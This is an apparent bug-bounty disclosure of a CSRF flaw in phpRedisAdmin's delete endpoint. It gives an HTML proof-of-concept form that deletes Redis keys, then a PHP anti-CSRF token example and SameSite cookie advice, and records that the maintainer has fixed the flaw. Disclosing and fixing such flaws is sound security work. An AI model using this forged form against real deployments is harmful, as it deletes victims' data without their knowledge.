Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin
Aug 23rd 2021
The delete-key functionality in the application is vulnerable to a CSRF attack.
Proof of Concept

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://domain.tld/phpRedisAdmin/delete.php?s=1&d=0&batch_del=1" method="POST">
      <input type="hidden" name="post" value="1" />
      <input type="hidden" name="selected_keys" value="123," />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
This vulnerability can let an attacker delete data from the database without the user's knowledge or interaction.
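The usual mitigation for this class of bug is a per-session anti-CSRF token that the legitimate delete form carries and that the endpoint verifies before acting. The following is an added illustration written for this report; it is not phpRedisAdmin's code and not the content of commit b57e3b, and the function names and the `csrf_token` field are assumptions.

```php
<?php
// Added example (not phpRedisAdmin's own code): synchronizer-token check for a
// delete endpoint that, like delete.php in this report, takes the POST fields
// `post` and `selected_keys` plus the `batch_del` query flag.

session_start();

// Issue one random token per session; the form embeds it as a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison so the check does not leak the token through timing.
function csrf_valid(?string $submitted): bool {
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// A cross-origin form like the PoC above cannot read the victim's session
// token, so its POST arrives without a valid `csrf_token` and is refused
// before any key is touched.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['post'])) {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Only reached with a valid token: parse the selected keys and delete them.
    $keys = array_filter(explode(',', $_POST['selected_keys'] ?? ''));
    // $redis->del(...$keys);  // the actual deletion, omitted in this example
}

// Confirmation form rendered by the legitimate UI, with the token embedded.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="POST" action="delete.php?s=1&amp;d=0&amp;batch_del=1">'
   . '<input type="hidden" name="post" value="1">'
   . '<input type="hidden" name="selected_keys" value="123,">'
   . '<input type="hidden" name="csrf_token" value="' . $token . '">'
   . '<input type="submit" value="Delete selected keys">'
   . '</form>';
```

Marking the session cookie `SameSite=Lax` or `Strict` (via `session_set_cookie_params` on PHP 7.3 and later) adds a second, browser-enforced layer, since the forged POST is then sent without the session cookie at all.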
We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 2 years ago
Erik Dubbelboer marked this as fixed with commit b57e3b 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE